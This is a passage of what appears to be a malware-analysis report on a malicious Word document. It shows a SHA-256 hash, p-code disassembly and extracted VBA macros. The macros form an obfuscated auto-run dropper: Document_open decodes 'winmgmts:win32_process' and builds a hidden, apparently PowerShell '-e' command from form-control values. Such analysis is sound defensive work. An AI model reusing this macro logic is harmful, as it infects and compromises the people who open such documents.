AepzxwaawS ' Line #65: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #66: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #67: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #68: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #69: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #70: ' SetStmt ' Ld Xgmlfqfrmwg ' ArgsLd Vjkeovxo 0x0001 ' Set Xzppuosw ' Line #71: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #72: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #73: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #74: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #75: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #76: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #77: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #78: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #79: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #80: ' LineCont 0x0004 03 00 00 00 ' Ld Create ' Ld khknasas ' Add ' Ld Wprzyvwtyfna ' Add ' Ld nbswe ' Ld Xzppuosw ' Ld Qligjvfscbzki ' ArgsMemCall (Call) Ndmuzmgqwfnem 0x0003 ' Line #81: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #82: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #83: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #84: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #85: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #86: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #87: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #88: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #89: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #90: ' EndFunc ' Line #91: ' FuncDefn (Function Vjkeovxo(Bewvqapoy)) ' Line #92: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #93: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #94: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #95: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #96: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #97: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #98: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #99: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #100: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #101: ' SetStmt ' Ld Bewvqapoy ' ArgsLd Xgydvghzai 0x0001 ' Set Vjkeovxo ' Line #102: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #103: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #104: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #105: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #106: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #107: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #108: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #109: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #110: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #111: ' LineCont 0x0004 02 00 00 00 ' Ld showwindow ' Ld Winlmvrthamff ' Add ' Ld Vjkeovxo ' MemSt Omwtgwbwskjly ' Line #112: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #113: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #114: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #115: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #116: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #117: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #118: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #119: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #120: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #121: ' EndFunc ' Line #122: ' FuncDefn (Function Wowzyiwozxtui(Fckgjrocvl)) ' Line #123: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #124: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #125: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #126: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #127: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #128: ' LitStr 0x000A "zSzItGhKYQ" …

SHA-256: 4db64d1851fdac975f87253b0cf33ed4ff2620ede5351a41b66adcfe54350544

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Jfpeclyblwjn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Gjtwcbhkrrm.Rekiwrjid
End Sub

Attribute VB_Name = "Nsskgikvi"
Attribute VB_Base = "0{1AAB3053-FBCE-49A4-A976-5167C320B218}{17508FF4-508C-419E-BB83-75A6F6496EA7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Pxtevpjny"
Attribute VB_Base = "0{D166229C-0027-4573-A416-7F942C56044B}{1F8483FF-4D05-442E-ADBD-949C72CE105F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ezbjmqrhzfwk()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Slzofajtoppo"
Attribute VB_Base = "0{0FB1DF62-3C11-4D0A-960D-66BDE0CDAE2F}{9426875B-E1A0-417D-9241-E87547782F2F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Mivmrruhg()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Tmckcsmmkd"
Attribute VB_Base = "0{72124EF7-EDFB-421C-8DEC-61096B13CFDA}{3C8AB7C4-4E95-4ECA-8484-DCB975E53AFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ysymllmuxp()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Qjktpykexemn"
Attribute VB_Base = "0{D5B77475-F34F-46C0-A533-9662812F664B}{834DCD66-5795-48C8-BEAB-3C457C62C07B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Lwcbpdhywt()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Jvugldbht"
Attribute VB_Base = "0{712CFEF0-848E-4B21-9490-B8BBBFCF6317}{B50253E8-4328-486A-898E-C9E905382A84}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Twlszmtgkf()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Pswahnsm"
Attribute VB_Base = "0{3AC35A12-5D58-48B5-A9BE-143AD82B218A}{278B3D0A-FEAA-40C7-B464-2307B8F71383}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kppkqsim()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Rojeekilcni"
Attribute VB_Base = "0{28283F03-61FD-4C5C-A604-820EEC392100}{574708BC-A69F-4742-AA82-58AF8FF8C495}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Vfopdttbg()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Gjtwcbhkrrm"
Function Rekiwrjid()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Geslfkmwji = "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){" + ChrW(Nsskgikvi.Zoom + 15) + ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){" + Nsskgikvi.Cqwhcdhk + "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Wowzyiwozxtui = Qligjvfscbzki(Geslfkmwji)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Xgydvghzai = CreateObject(Wowzyiwozxtui)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Wauqbcjk = Nsskgikvi.Hgtoflbuiz.Tag
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Hjezbxrfuds = Wowzyiwozxtui + ChrW(Nsskgikvi.Zoom + 15) + Nsskgikvi.Xgmlfqfrmwg.Tag + Wauqbcjk
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Xzppuosw = Hjezbxrfuds + Nsskgikvi.Cqwhcdhk
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Vjkeovxo = Ndmuzmgqwfnem(Xzppuosw)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Call Xgydvghzai. _
Create(khknasas + Wprzyvwtyfna + nbswe, Bewvqapoy, Vjkeovxo)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Ndmuzmgqwfnem(Omwtgwbwskjly)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Ndmuzmgqwfnem = CreateObject(Omwtgwbwskjly)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Ndmuzmgqwfnem. _
showwindow = Winlmvrthamff + Fckgjrocvl
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Qligjvfscbzki(Rjmerlgajjhzv)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Qligjvfscbzki = CVar(Join(Split(Rjmerlgajjhzv, "}&*$**(){"), NoLineBreakAfter))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Wprzyvwtyfna()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
nnannauwe = "}&*$**(){ }&*$**(){-}&*$**(){e}&*$**(){ }&*$**(){"
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Jivhehoeol = ChrW(Int(wdKeyP))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Zpghswhqlka = Jivhehoeol + Nsskgikvi.Slhmsdtwf.ControlTipText + nnannauwe
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
dkhiqwhnkew = Nsskgikvi.Vslpzipioric.Pages(0).Caption
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Wprzyvwtyfna = Qligjvfscbzki(Zpghswhqlka + StrReverse(dkhiqwhnkew))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function


' Processing file: /opt/analyzer/scan_staging/5d4bbab68584412d93972d213d1c1869.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Jfpeclyblwjn - 1902 bytes
' Line #0:
' 	FuncDefn (Private Sub Jfpeclyblwjn())
' Line #1:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #2:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #3:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #4:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #5:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #6:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #7:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #8:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #9:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #10:
' 	Ld FlAUEmBDUn 
' 	ArgsMemCall Gjtwcbhkrrm 0x0000 
' Line #11:
' 	EndSub 
' Macros/VBA/Nsskgikvi - 1167 bytes
' Macros/VBA/Pxtevpjny - 1397 bytes
' Line #0:
' 	FuncDefn (Sub Ezbjmqrhzfwk())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Slzofajtoppo - 1395 bytes
' Line #0:
' 	FuncDefn (Sub Mivmrruhg())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Tmckcsmmkd - 1395 bytes
' Line #0:
' 	FuncDefn (Sub Ysymllmuxp())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Qjktpykexemn - 1398 bytes
' Line #0:
' 	FuncDefn (Sub Lwcbpdhywt())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Jvugldbht - 1392 bytes
' Line #0:
' 	FuncDefn (Sub Twlszmtgkf())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Pswahnsm - 1391 bytes
' Line #0:
' 	FuncDefn (Sub Kppkqsim())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Rojeekilcni - 1394 bytes
' Line #0:
' 	FuncDefn (Sub Vfopdttbg())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Gjtwcbhkrrm - 11886 bytes
' Line #0:
' 	FuncDefn (Function Gjtwcbhkrrm())
' Line #1:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #2:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #3:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #4:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #5:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #6:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #7:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #8:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #9:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #10:
' 	LitStr 0x006A "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){"
' 	Ld Nsskgikvi 
' 	MemLd ChrW 
' 	LitDI2 0x000F 
' 	Add 
' 	ArgsLd Geslfkmwji 0x0001 
' 	Add 
' 	LitStr 0x0061 ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){"
' 	Add 
' 	Ld Nsskgikvi 
' 	MemLd Zoom 
' 	Add 
